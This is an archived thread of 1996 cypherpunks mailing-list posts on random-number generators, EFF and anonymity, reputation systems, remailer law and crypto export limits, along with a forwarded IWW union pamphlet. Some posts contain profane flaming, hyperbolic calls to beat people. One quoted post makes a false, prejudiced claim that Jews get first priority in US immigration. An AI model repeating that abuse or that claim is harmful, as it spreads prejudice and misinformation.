>I'm reading Knuth chapter 3 on "random numbers". Have there
>been any major advances since the publication of the second
>edition of _The Art of Computer Programming, Volume 2_ in 1981?
A much-referenced article: Marsaglia, G. (1985). "A current view of random number generation". In L. Billard (ed.), _Computer Science and Statistics: The Interface_. A more recent survey, which I haven't read: L'Ecuyer, P. (1990). "Random numbers for simulation". CACM 87, no. 10, 85-97. I read the resulting _NYT_ blurb, but not the paper: Ferrenberg et al. (1992). "Monte Carlo simulations: Hidden errors from `good' random number generators". Phys. Rev. Lett. 69, 3382-4. This is from the "simulation" angle, which is where Knuth is coming from. For crypto you may be interested in the complexity-theoretic approach (things like Blum-Blum-Shub), which is a whole different field. >Are any of the ideas advocated in chapter 3 now considered >inadvisable? I think the Marsaglia paper sank Knuth's recommended generator. "Sank" is a relative term, of course. -- Eli Brandt eli+ at cs.cmu.edu From jonl at well.com Tue Sep 3 22:56:43 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 13:56:43 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904032356.006dd760@mail.well.com> At 05:56 PM 9/3/96 -0800, jim bell wrote: >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many >decades, people have been able to walk up to a pay telephone at 3:00 AM and >make a harassing phone call to somebody, a "problem" which still exists and >no solution is being implemented for. > >I think it's reasonable to come to the conclusion that there is no solution >to the anonymity "problem" that isn't worse than the underlying anonymity. >And, BTW, I don't consider a pro-anonymity position to be an extremist one. Yeah, the main point re. anonymity, IMO, is that you can't pretend that it's all pro, no con. You have to acknowledge and think through the negatives...and, as Tim May pointed out, that's already been done. I don't think you oughtta ream somebody for pointing to the down side. 
That you raise an issue should never be taken to imply that you've taken a position, and it's vital to remain open to discussion and entertain sentiments that oppose your own thinking. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From dlv at bwalk.dm.com Tue Sep 3 23:01:34 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 14:01:34 +0800 Subject: Voting Monarchist? In-Reply-To: <199609032341.QAA24172@netcom.netcom.com> Message-ID: <42oPTD12w165w@bwalk.dm.com> qut at netcom.com (Dave Harman OBC) writes: > ! > > Vote Monarchist > ! > > ! > who is the candidate? LaRouche? > ! > ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running > ! for president. Anyone who doesn't advocate killing all kings, presidents, > ! and prime ministers is a fucking statist and should be beaten to a pulp > ! with a rattan stick. > > That's the problem with the Libertarians, they've got some sort of > hang up about beatings. Must be some childhood difficulties. I ain't no fucking Libertarian. All Libertarians are fucking statists. P.S. you also wrote: ]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin ]the blame on the good doctor. I'm glad {s}he posted it, it was funny ]and it also gave a hint who did the forgery of Ingrid. Either ]someone out to get him, or the doctor himself, if so, he lives in ]New York City too! Maybe you can meet your secret admirer! While Rich Graves is a proven liar and forger, the article you refer to is a perfectly good and authentic article from Rabbi Shlomo R. I don't know who forged Ingrid - probably Rich Graves, a proven forger, liar, and a fucking Libertarian statist. ]Now if it's someone out to get the doctor, I'd pin the blame on ]Rich Graves, because of his obssessive hatred of Ingrid, in which ]he did the post so it could be blamed on Dr. 
Fuckhead, who ]perhaps would hate Ingrid too, because she has written many times ]about how her family was hurt by Russians and Jews. Dr. Fuckhead ]may be Jewish, you know, since 80% of immigrants from Russia this ]generation have been Jewish, because Jews have first priorty in ]USA immigration law. Yes, I'm Jewish. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jonl at well.com Tue Sep 3 23:05:06 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 14:05:06 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904034147.006f6cd4@mail.well.com> At 08:04 PM 9/3/96 -0700, Timothy C. May wrote: >The reason this is such a hot button for Cypherpunks is that "responsible >freedom" and "accountability" are often code words for controlling some >very basic freedoms. Placing limits on anonymous speech would involve some >very fundamental restrictions on freedoms of various sorts. Even if >"safeguards" are built-in, the effect would almost certainly be to >illegalize remailers (unless they had "escrow" features!). And a wide array >of other freedoms, too numerous for me to write about here. The terms "responsibility" and "accountability" are misused, which is unfortunate, since I think we'd all argue in favor of taking responsibility for our speech/actions in a positive sense. The negative is in asking me to sacrifice my freedom because some few behave irresponsibly. This is like setting an illogical default, assuming that it's a preventive, but it prevents nothing. Getting beyond this discussion of EFF, has any global entity discussed making remailers illegal? 
jonl

--
Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky

From mech at eff.org Tue Sep 3 23:05:55 1996
From: mech at eff.org (Stanton McCandlish)
Date: Wed, 4 Sep 1996 14:05:55 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <199609032113.OAA06380@dns2.noc.best.net>
Message-ID: <199609040043.RAA05468@eff.org>

James A. Donald typed:
>
> At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote:
> > EFF in generally does not issue extremist position
> > statements, but is careful to examine the risks as well as the benefits,
> > and look for pro-liberty solutions to those risks.
>
> If the right to speak anonymously is an "extremist" position in the eyes
> of the EFF, then they are no friends of liberty.

Recognition of the right to anything without recognition of the ethics that need to be observed in exercising that right, is an extremist position just as much as is a demand people give up liberty so that "responsibility" can be enforced. It's probably far less dangerous in most cases, but it's still rather indefensible. That's all.

We certainly do NOT advocate what you may be misinterpreting as our position: that rights should or must be taken away when people behave unethically, or due to the fear that people will behave unethically. That's precisely the opposite of our opinion on everything we have an opinion on. We hold that liberty must be preserved *in spite of* inevitable abuses. But we also hold that it's important to know the ethics that come with rights, to adhere to them, to educate other people about them. Otherwise the rights aren't worth much. What is the value of free speech if every message you receive is a threat, defamation, spam, or private information stolen from someone else? (to give a fairly extreme example).
> It is the overwhelmingly mainstream position, not just among netizens, > but when last heard, amongst supreme court judges and ordinary people > in the street. I believe we are talking about precisely the same position, just in different terms. Let's not argue. :) -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist

From banisar at epic.org Tue Sep 3 23:06:43 1996
From: banisar at epic.org (Dave Banisar)
Date: Wed, 4 Sep 1996 14:06:43 +0800
Subject: Anonymity
Message-ID:

Speaking of anonymous transactions, a fair trading office in London found that mondex is not truly anonymous (they were claiming it for a while until the complaint was filed by PI director Simon Davies).

A couple of docs are available at http://www.privacy.org/pi/activities/mondex/

Dave

_________________________________________________________________________
Subject: Anonymity
_________________________________________________________________________
David Banisar (Banisar at epic.org)     * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * HTTP://www.epic.org
Washington, DC 20003                   * ftp/gopher/wais cpsr.org

From tcmay at got.net Tue Sep 3 23:11:52 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 14:11:52 +0800
Subject: Reputations
Message-ID:

Something closely related to anonymity issues is _reputation_.

As I keep saying, there have been dozens of articles on this and similar topics. Mostly in the early days, when we were exploring such things (well, some of us had started exploring them some years earlier...).

Regrettably, the archive system is not very functional, especially not for older articles (there are rumors that L. Todd Masco took down the archive site due to pressure from the "Wall Street Journal" over their copyrighted articles in the archives...those Web spiders find all such copyright violations!).

Here's another fragment of my Cyphernomicon, making some points about positive reputations.

Briefly, think of "restaurants" when thinking about reputations. If one arrives in a new city, most restaurants may have the same baseline reputation, e.g. "none." A few may be known by name, for their "reputation," either good ("You have to eat at Louie's--the laser chicken is incredible") or bad ("Blecch!").
Positive reputations and negative reputations are self-explanatory. And the reputations of others may affect the reputations of restaurants ("John Gilmore says he likes the Burma Burger on Castro Street."). Bad recommendations may affect the "reputation capital" of John, for example. (We speak of "reputation capital" because it can in some sense be "spent.") And so on.

Many of the debates about anonymity seem to ignore reputations, filters, kill files. It is almost as if the critics of anonymous speech are saying "If there is not accountability for restaurant recommendations, we'll all be buried in garbage food." This ignores the _emergent order_ or _evolutionary_ nature of actors in the restaurant and restaurant evaluator market.

Free speech is often messy. 98% of everything I read or hear is crap, to do Sturgeon one better. But I use judgement to decide what to read, who to listen to, and what to mostly ignore. I use _reputation_ to choose restaurants, books, movies, speakers to listen to, etc.

Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take a while to gather a "positive reputation," and some never do. This is the way speech works. "Accountability" is a red herring.

Anyway, here's the promised excerpt:

15.5.5. reputations are what keep CA systems from degenerating into flamefests
- digital pseudonyms mean a trail is left, kill files can be used, and people will take care about what they say
- and the systems will not be truly anonymous: some people will see the same other people, allowing the development of histories and continued interactions (recall that in cases where no future interaction is expected, rudeness and flaming creeps in)
+ "Rumormonger" at Apple (and elsewhere) always degenerates into flames and crudities, says Johann Strandberg
- but this is what reputations will partly offset

15.5.6. "brilliant pennies" scam

15.5.7. "reputation float" is how money can be pulled out of the future value of a reputation

15.5.8.
Reputation-based systems and repeat business
  + reputations matter...this is the main basis of our economic system
    - repeat business....people stop doing business with those they don't trust, or who mistreat them, or those who just don't seem to be reputable
    - and even in centrally-controlled systems, reputations matter (can't force people to undertake some relations)
    - credit ratings (even for pseudonyms) matter
    - escrow agents, bonding, etc.
    - criminal systems still rely on reputations and even on honor
    - ironically, it is often in cases where there are restrictions on choice that the advantages of reputations are lost, as when the government bans discrimination, limits choice, or insists on determining who can do business with who
  + Repeat business is the most important aspect
    - granularity of transactions, cash flow, game-theoretic analysis of advantages of "defecting"
    - anytime a transaction has a value that is very large (compared to expected future profits from transactions, or on absolute basis), watch out
    - ideally, a series of smaller transactions are more conducive to fair trading...for example, if one gets a bad meal at a restaurant, one avoids that restaurant in the future, rather than suing (even though one can claim to have been "damaged")
    - issues of contract as well

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Licensed Ontologist | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Tue Sep 3 23:13:42 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 14:13:42 +0800
Subject: What is the EFF doing exactly?
Message-ID:

At 3:41 AM 9/4/96, Jon Lebkowsky wrote:

>The terms "responsibility" and "accountability" are misused, which is
>unfortunate, since I think we'd all argue in favor of taking responsibility
>for our speech/actions in a positive sense. The negative is in asking me to
>sacrifice my freedom because some few behave irresponsibly. This is like
>setting an illogical default, assuming that it's a preventive, but it
>prevents nothing.

Well, I've written a lot (or forwarded a lot) on various aspects of this issue. Both terms are _overloaded_, probably to the point of not even being useful terms for this debate. Everyone comes in to the debate with their notions of what "responsible" speech is, what "accountability" entails, etc.

Having said this, and not knowing how your (or anyone else's) definitions relate to mine, I simply don't agree that I have to take responsibility for all of my speech/actions. I can think of many cases where I have elected to use untraceable anonymity, as many others have, so those are direct counterexamples to your point, thus disproving your "I think we'd all argue in favor of taking responsibility" point.

(A vast number of other points worthy of discussion. I am happy to hear from at least two EFF "insiders" that this issue is being discussed within EFF as we speak. It's about time. Anonymity is a whole lot more than just about "anonymous posts" from "Mr. Anonymous." The issue hits on issues of True Names, speech licenses, escrow, legality of remailers, business vs. personal speech, etc.)

>Getting beyond this discussion of EFF, has any global entity discussed
>making remailers illegal?
>

By "global entity" do you mean the U.N., or the Borg?

The G7 issued a typically vague statement about cracking down on terrorist communications...this could be construed as the beginnings of an assault on Cypherpunkish sorts of things. Too soon to tell.
The Church of Scientology (the same group which favorably quotes Esther Dyson's concerns about anonymity and dangerous speech) has of course been targeting remailers for a long time. Not in getting them outlawed, but in getting them to divulge names and logs. This has the effect of harassing remailers, and causing some to discontinue them...probably a desired effect. Julf's shutdown of Penet they probably are dancing a jig over (but the last laugh will be when users transition to a world-wide, distributed, robust network of Cypherpunks-style remailers).

Within the U.S. there are few ways remailers could be shut down, in terms of legal action. The various Supreme Court cases have been discussed many times.

I suspect the Digital Telephony Act could be invoked to demand that ISPs make their systems wiretappable: then, if the presence of a remailer defeats this wire-tappability, the ISP could force the remailer off. (I'm not an expert, but I believe DT doesn't apply to computer bulletin boards and ISPs, only to phone systems. But as Internet telephony spreads, and any ISP may also be a de facto phone system, couldn't the language of DT be extended to cover ISPs? This is something I worried about at the time the EFF helped give us Digital Telephony.)

If legislation passes that makes carrying and producing identification mandatory (and this could happen by either the immigration or anti-terrorism route, or both), and if the Postal Service succeeds in getting accepted their scheme to require positive identification of all letter and package senders, then the same sorts of laws could be used to require that all e-mail messages have a True Name attached.

Poof, there go the remailers.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Licensed Ontologist | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From hvdl at sequent.com Tue Sep 3 23:55:59 1996
From: hvdl at sequent.com (Hans Unicorn Van de Looy)
Date: Wed, 4 Sep 1996 14:55:59 +0800
Subject: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To:
Message-ID: <9609040450.AA01346@amsqnt.nl.sequent.com>

Hi Tim,

The one-and-only Timothy C. May once stated:

! At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote:
! >::
! >Request-Remailing-To: remailer at huge.cajones.com
! ....
! >::
! >Request-Remailing-To: remailer at remailer.nl.com
! ....
! >::
! >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod)
! >
!
!
! >Deep Throat.
!
!
! Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines!

Like I explained before, this was a problem with a user of one of my/our systems, and has been taken care of.

! At least now we know who the _other_ "Unicorn" is.

Well that has never been a secret... Has it?

! How's Sequent doing? Is Casey Powell still there?

Sequent is doing extremely well. New architecture well on its way, looking good! And yes, Casey is still in charge. Wanna know more? Then let's continue this off line...

! --Tim May
!
! We got computers, we're tapping phone lines, I know that that ain't allowed.
! ---------:---------:---------:---------:---------:---------:---------:----
! Timothy C. May | Crypto Anarchy: encryption, digital money,
! tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
! W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
! Licensed Ontologist | black markets, collapse of governments.
! "National borders aren't even speed bumps on the information superhighway."
--
GreetZ, Hans.
==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
,;( )_, )~\| Hans "Unicorn" Van de Looy PGP: ED FE 42 22 95 44 25 D8
;; // `--; GSM: +31 653 261 368 BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl at sequent.com for more info ===================

From flengyel at dorsai.org Wed Sep 4 00:03:00 1996
From: flengyel at dorsai.org (Florian Lengyel)
Date: Wed, 4 Sep 1996 15:03:00 +0800
Subject: The Esther Dyson Flap
In-Reply-To:
Message-ID: <322D3D08.314@dorsai.org>

Dr.Dimitri Vulis KOTM wrote:
>
>>[excise]
>
> The gubment has no right to fuck with any speech - (seditious) libel, child
> porn, bomb-making instructions...
>

Agreed. Otherwise, by a slippery slope argument, they can eventually suppress any form of speech whatsoever.

>
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From ses at tipper.oit.unc.edu Wed Sep 4 00:43:16 1996
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 4 Sep 1996 15:43:16 +0800
Subject: rc2 export limits..
In-Reply-To:
Message-ID:

It's the usual - if you want commercial jurisdiction,

40 bits unescrowed
64 bits (16 escrowed)

Above that, you'll have to go through state on a per customer basis (which I don't think is that easy to get if software is being shipped outside the US, and is definitely going to be expensive.)

Simon

---
Cause maybe (maybe) | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all | Email address remains unchanged
You're my firewall - | ........First in Usenet.........

From declan at well.com Wed Sep 4 00:44:00 1996
From: declan at well.com (Declan McCullagh)
Date: Wed, 4 Sep 1996 15:44:00 +0800
Subject: Workers of the Web, UNITE!
Message-ID:

Tired: Libertarian cypherpunks
Wired: Crypto-socialists

"Whether they be fast-food workers, word processors, or micro-chip assemblers, today's non-union wage workers need the IWW's brand of no-compromise unionism even more than their predecessors."

:)

-Declan

http://iww.org/tandv.html

> THE WOBBLIES:
>
> Tactics and Vision for a New Workers' Movement
>
> An Introduction to the Industrial Workers of the World (IWW)
>
> ISN'T THE IWW JUST FOR FACTORY WORKERS?
>
> Every worker is an "industrial" worker - whether they work in health
> care, tourism, education, or publishing. The relatively recent
> association between the word "industry" and heavy manufacturing is
> misleading, and was never intended to be by the founders of the IWW.
> If you earn your living by working with your hands or your mind,
> then you're welcome in the IWW. Only bosses (defined as those with
> direct power to hire and fire) are excluded from IWW membership.
>
> The Wobblies (as members of the IWW are known) have historically
> focused on helping organize those workers that the American
> Federation of Labor (AFL) shunned. In the early 1900s that meant
> African-Americans, immigrants, women, and unskilled laborers. Today
> that means curbside recyclers, non-profit staffers, temp workers,
> sex-industry workers, co-op employees -- in short, any worker in any
> workplace regardless of size or structure.
>
> CAN THE IWW HELP ME TO IMPROVE THE WAGES OR WORKING CONDITIONS AT MY
> CURRENT JOB?
>
> That largely depends on you. The IWW is a "do-it-yourself" union,
> and does not provide an all-knowing leadership or hefty treasury to
> fight your battles for you. But if you're willing to organize at
> your job-site by talking with your co-workers about the issues that
> matter to them, then you can count on your fellow workers in the IWW
> to lend their full support to your struggle.
>
> Individual workers can accomplish little by themselves, and are
> liable to be fired if they raise their voice in protest. But by
> joining together in a union such as the IWW, workers are far more
> powerful when confronting their boss about workplace injustices. Our
> union can provide tangible, community-based resources such as
> low-cost printing, speakers, legal advice, and how-to manuals, as
> well as bodies on a picket line. You won't get bureaucrats in suits
> and ties telling you how to run your strike, just friends lending a
> hand where they can.
>
> THE IWW AND MAINSTREAM LABOR
>
> For almost a century, the leadership of the AFL-CIO has worked hand
> in hand with the capitalists to squelch rank and file militancy.
> Their overriding concern has been "industrial harmony," not economic
> and social justice, and so they fail to question the most basic
> assumptions of capitalist production. While union bosses play golf
> with the titans of industry, real wages and safety conditions have
> continued to worsen these last thirty years or so.
>
> Regular AFL trade unions split workers up into their respective
> skills, allowing one craft union to cross the picket line of
> another. The IWW believes in "industrial unionism," organizing all
> workers in a given industry into the same union (thus our name). At
> a construction site, for instance, the carpenters should be able to
> count on the unswerving support of the plumbers, laborers,
> electricians, and hod carriers in the event of a strike. This is
> much simpler when all these workers are in the same industrial
> union, rather than separate, even competing, trade unions.
>
> Some Wobblies find themselves in jobs where they are represented by
> these more conservative trade unions. These "two-card" Wobs often
> bring their IWW principles to the union hall with them, agitating
> for rank and file democracy, more militant "direct action" tactics,
> and class solidarity.
> The IWW does not believe in signing away the
> right to strike ( the so-called "no strike" clause), nor does it
> condone the "dues check-off," in which management deducts union dues
> directly from the paycheck. While the IWW often does strike support
> for other unions when necessary, we also try to keep our sights on
> the bigger prize ahead.
>
> DIDN'T THE IWW DIE OUT? ARE ITS IDEAS STILL RELEVANT?
>
> The IWW was nearly crushed in the early 1920's by some of the
> fiercest repression ever unleashed by big business and the U.S.
> government. Because the IWW had strongholds in industries that were
> critical to the First World War effort, and because they refused to
> do their patriotic bit by signing no-strike pledges for the duration
> of the war, the Wobblies were branded "pro-German" and relentlessly
> persecuted.
>
> The world economy has changed a lot since the days when the IWW
> controlled great sections of the logging, mining, and agricultural
> industries. Yet despite tremendous technological advances and the
> structural reorganization of capital, industrial unionism remains a
> fundamentally sound basis for workers' self-organization. Today,
> while mainstream labor tries desperately to hold its ground against
> the anti-worker policies of the ruling political parties, vast new
> sectors of the economy have opened up that the AFL-CIO would never
> dream of organizing.
>
> Whether they be fast-food workers, word processors, or micro-chip
> assemblers, today's non-union wage workers need the IWW's brand of
> no-compromise unionism even more than their predecessors. Winning
> the eight-hour day was not enough. We must redefine the very meaning
> of work itself, and find ways to redistribute society's wealth for
> the benefit of all.
>
> DOES THE IWW SUPPORT ANY POLITICAL PARTY?
>
> The IWW is a labor union, not a political party.
> We believe that
> economic justice must be achieved through economic struggle, whether
> that be with our boss or our landlord. The institutions of
> government have always proven themselves to be the allies of
> Capital, so we do not wait for politicians to free us from wage-slavery.
> We believe our power lies in the workplace, not in "the
> vote" - since it is our labor on which bosses are dependent.
>
> The IWW has successfully resisted attempts by various "left" parties
> to make the union a mere tool of their political ambitions. Our
> Constitution explicitly states "the IWW refuses all alliances,
> direct and indirect, with existing parties and anti-political
> sects." This policy has helped us avoid the sectarian feuding that
> can easily destroy a group.
>
> True, our commitment to worker control and the abolition of
> capitalism has not won us any friends among the ruling elites, and
> our disavowal of all political party affiliation has not prevented
> us from being red-baited. We address the root causes of this
> society's problems, and that makes us "radical," but we have the
> common sense to leave our electoral political views outside the
> union hall where they belong.
>
> WHAT IS DIRECT ACTION?
>
> The labor movement has been most successful when it relied on the
> direct intervention of the workers to obtain their demands. Rather
> than allowing professional negotiators to speak for them, Wobblies
> have engaged in those tactics which they could control themselves --
> strikes, slowdowns, monkey wrenching -- what we call sabotage.
>
> Sabotage in this context does not mean arson and dynamite. It's more
> properly defined as "the conscious withdrawal of efficiency."
> Staying at your workstation but reducing your production by half
> will bring a boss to his knees quicker than a whole team of
> negotiators.
>
> The IWW has never advocated violence.
> By fighting for justice with
> non-violent tactics, the IWW has often won the support of an
> initially mistrustful public.
>
> WHAT IS A GENERAL STRIKE?
>
> The General Strike has long been touted by militant unionists as the
> ultimate expression of workers' power, and it still plays an
> important role in the IWW's program for social change. Simply put, a
> General strike is a massive work stoppage on a local, regional, or
> national scale, and may involve people either staying home or
> occupying their workplaces and refusing to work.
>
> A General Strike halts business as usual, and serves notice to those
> in power that those of us doing the work have the ultimate say in
> whether that work gets done or not. It debunks the myth that power
> flows downward, and proves instead that all real power still resides
> at the grassroots level, if we only choose to exercise it.
>
> The General Strike is a common tactic in many countries of the
> world, yet most North American workers are unfamiliar with it. This
> is largely the result of the conservative trade unions' reluctance
> to flex their economic muscle and rock the boat. A great deal of
> education and organization must take place before North American
> workers are ready to wage a successful General Strike, and it's
> toward this end that the IWW dedicates itself.
>
> THE IWW AND FEMINISM
>
> Women have been active in the IWW since its inception. Elizabeth
> Gurley Flynn, one of the union's best known agitators, once said that
> "the IWW has been accused of pushing women to the front. This is not
> true. Rather, the women have not been kept in back, and so they have
> naturally moved to the front."
>
> Much of the work that has traditionally been done by women was not
> recognized as such by the male-run business unions. The IWW supports
> the right of homemakers, sex-industry workers, and other women to
> organize for better conditions and wages just like other workers.
>
> THE IWW AND MILITARISM
>
> Wars between nations have never benefitted the working class, and
> they never will. The war profiteers, safe in their mansions and
> boardrooms, never consider the human cost of their military
> adventurism. Working people are mere cannon fodder for their
> corporate and imperialist ambitions.
>
> Real working class solidarity does not recognize the artificial
> borders erected between nation-states, but instead unites against a
> common class enemy. Poor people, especially those of color, make up
> a disproportionate part of the armed forces, simply because few
> other economic options are available.
>
> To put an end to war, working people must lay down their arms and
> refuse to fight for their masters. Unfortunately, many have been
> brainwashed into thinking that their interests are the same as those
> of the people in power, so this is easier said than done.
> Nevertheless, the IWW is committed to fighting patriotic propaganda
> by educating workers about where their real self-interest lies.
>
> THE IWW AND THE ENVIRONMENT
>
> Bhopal, Chernobyl, the Exxon Valdez oil spill... These are just a
> few examples of how dangerous it can be to put profit before people.
> Government regulation and public outcry can at best slow down the
> destruction of our planet, not reverse it.
>
> Workers and their families suffer the worst effects of pollution.
> The workplace continues to be a very dangerous environment, and
> working class communities are often the site for toxic dumps,
> incinerators, and the like.
>
> Workers' control of all industry is the only practical strategy for
> assuring the practice of sustainable and environmentally sound forms
> of production. For if the workers in all polluting industries were
> to withdraw their labor, the poison factories could be shut down in
> a matter of weeks. The workers themselves must decide whether or not
> what they produce is socially useful.
>
> JOIN THE I.W.W.
>
> NO BUREAUCRATS - Aside from the modestly paid General
> Secretary/Treasurer, the I.W.W. has no paid officers. The General
> Executive Board is elected annually by the entire membership, and
> its job is to oversee the running of union affairs, not to set
> policy. All officers may be recalled at any time by referendum.
>
> REAL DEMOCRACY - All policy decisions are made by the members
> themselves by referendum. All branches maintain full autonomy on
> matters within their jurisdiction. Job branches (I.W.W. groups
> composed of workers at a single job-site) set their own demands and
> strategies in negotiations, free of meddling internationals or
> sellout business agents.
>
> LOW DUES - Our dues are structured on a sliding scale basis.
> Unemployed and low-income workers pay $5 a month; those making
> between $800 and $1,700 per month pay $9; members making more than
> $1,700 per month pay $12 monthly dues; and workers in extremely poor
> financial situations may pay only $3 per month. Initiation fees
> equal one month's dues; so a very low-income worker can join for as
> little as $6.
>
> TO JOIN - Fill out the questions below and send a copy of this form
> with your check or money order (in U.S. funds) to I.W.W., 103 W.
> Michigan Ave., Ypsilanti, MI 48197, USA.
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> ___ I affirm that I am a common worker without direct power to hire
> and fire.
>
> ___ I agree to abide by the constitution and regulations of this
> organization.
>
> ___ I will study its principles and make myself acquainted with its
> purposes.
>
> Name ____________________________________________________________
>
> Occupation ______________________________________________________
>
> Industry ________________________________________________________
>
> Address _________________________________________________________
>
> City ____________________________________________________________
>
> State/Province __________________________________________________
>
> Zip _____________________________________________________________
>
> Phone ___________________________________________________________
>
> Email ___________________________________________________________
>
> Total amount enclosed $__________________________________________
>
> Initiation $_____________________________________________________
>
> Dues $ __________________________________________________________
>
> When you join the I.W.W., you'll receive a free subscription to our
> newspaper, the Industrial Worker, in addition to your membership
> card, constitution, button, and the One Big Union pamphlet which
> describes the structure and function of the I.W.W. in detail. You'll
> also start to get a monthly publication for members only called the
> General Organization Bulletin, which contains Board motions,
> financial reports, and members' discussion of various internal
> matters such as upcoming referenda. And if you have access to email,
> you'll be invited to join a growing network of Wobblies engaging in
> on-line communications.
>
> IWW PREAMBLE
>
> The working class and the employing class have nothing in common.
> There can be no peace so long as hunger and want are found among
> millions of working people; and the few, who make up the employing
> class, have all the good things in life.
>
> Between these two classes a struggle must go on until the workers of
> the world organize as a class, take possession of the machinery of
> production, abolish the wage system, and live in harmony with the
> earth.
>
> We find that the centering of the management of industries into
> fewer and fewer hands makes the trade unions unable to cope with the
> ever growing power of the employing class. The trade unions foster a
> state of affairs which allows one set of workers to be pitted
> against another set of workers in the same industry, thereby helping
> to defeat one another in wage wars. Moreover, the trade unions aid
> the employing class to mislead the workers into the belief that the
> working class has interests in common with its employers.
>
> These conditions can be changed and the interests of the working
> class upheld only by an organization formed in such a way that all
> its members in any one industry, or in all industries if necessary,
> cease work whenever a strike or lockout is on in any department
> thereof, thus making an injury to one an injury to all.
>
> Instead of the conservative motto, "A fair day's wage for a fair
> day's work," we must inscribe on our banner the revolutionary
> watchword, "Abolition of the wage system."
>
> It is the historic mission of the working class to do away with
> capitalism. The army of production must be organized, not only for
> the everyday struggle with capitalists, but also to carry on
> production when capitalism shall have been overthrown. By organizing
> industrially we are forming the structure of the new society within
> the shell of the old.
>
> CONTACT THE IWW GENERAL HEADQUARTERS AT
> 103 W. Michigan Ave.
> Ypsilanti, MI 48197, USA
> ph: 313-483-3548
> fax: 313-483-4050
> email: iww at igc.apc.org

From jimbell at pacifier.com Wed Sep 4 00:49:14 1996
From: jimbell at pacifier.com (jim bell)
Date: Wed, 4 Sep 1996 15:49:14 +0800
Subject: What is the EFF doing exactly?
Message-ID: <199609040534.WAA18683@mail.pacifier.com>

At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote:

>The terms "responsibility" and "accountability" are misused, which is
>unfortunate, since I think we'd all argue in favor of taking responsibility
>for our speech/actions in a positive sense. The negative is in asking me to
>sacrifice my freedom because some few behave irresponsibly. This is like
>setting an illogical default, assuming that it's a preventive, but it
>prevents nothing.
>
>Getting beyond this discussion of EFF, has any global entity discussed
>making remailers illegal?

The Leahy crypto bill introduced early this year made (paraphrasing) "the use of encryption to thwart a law-enforcement investigation illegal." I immediately pointed out that while this wouldn't make _encrypted_ remailers illegal, per se, effectively it would because the moment an investigation (even a phony or trumped-up one) is started and is "thwarted" by the encryption used, the remailer operator became guilty of a crime.

True, the USG isn't quite a "global entity" (even though it has a nasty habit of behaving like it!), but along with Europe (which would presumably treaty with USG any such restrictions) it's the next closest thing.

Jim Bell
jimbell at pacifier.com

From jimbell at pacifier.com Wed Sep 4 01:09:25 1996
From: jimbell at pacifier.com (jim bell)
Date: Wed, 4 Sep 1996 16:09:25 +0800
Subject: What is the EFF doing exactly?
Message-ID: <199609040412.VAA13877@mail.pacifier.com>

At 03:02 PM 9/3/96 -0700, Stanton McCandlish wrote:
>> But we do not want legislation, so we do not want to help write legislation.
>>
>> We want to delay legislation for as long as possible, for the longer the
>> delay, the more the balance of power favors the net and disfavors the pols.
>>
>> Therefore the correct strategy is simply to attack any politician who shows
>> any interest in legislating on our issues.
>>
>> We have no friends on Capitol hill, and if we did have friends, it would
>> still be necessary to denounce them as enemies.
>
>I agree with the general sentiment behind this, but I think it may go a
>bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE
>(the two crypto bills now floating around in Congress). On the surface
>they both appear to threaten the viability of the Bernstein, Karn and
>Junger cases, but in reality neither of these bills have a chance in hell
>of passage.

